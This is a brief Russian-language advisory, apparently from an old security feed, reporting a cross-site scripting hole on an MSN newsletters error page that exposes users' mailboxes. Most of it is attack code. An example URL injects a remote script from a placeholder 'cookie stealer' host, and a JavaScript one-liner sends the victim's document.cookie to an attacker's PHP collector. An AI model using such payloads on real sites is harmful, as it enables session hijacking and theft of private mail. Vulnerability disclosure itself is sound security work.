CSS уязвимость обнаружена на сайте MSN.com.
Нападающий может получить доступ к
почтовому ящику пользователя.
Пример:
http://newsletters.msn.com/hm/HMError.asp?CB=http://yourcookiestealer/stealer.js
В качестве скрипта можно использовать
например такой:
i=new/**/Image();i.src=http://his_stealer/s.php?cookie=+document.cookie;
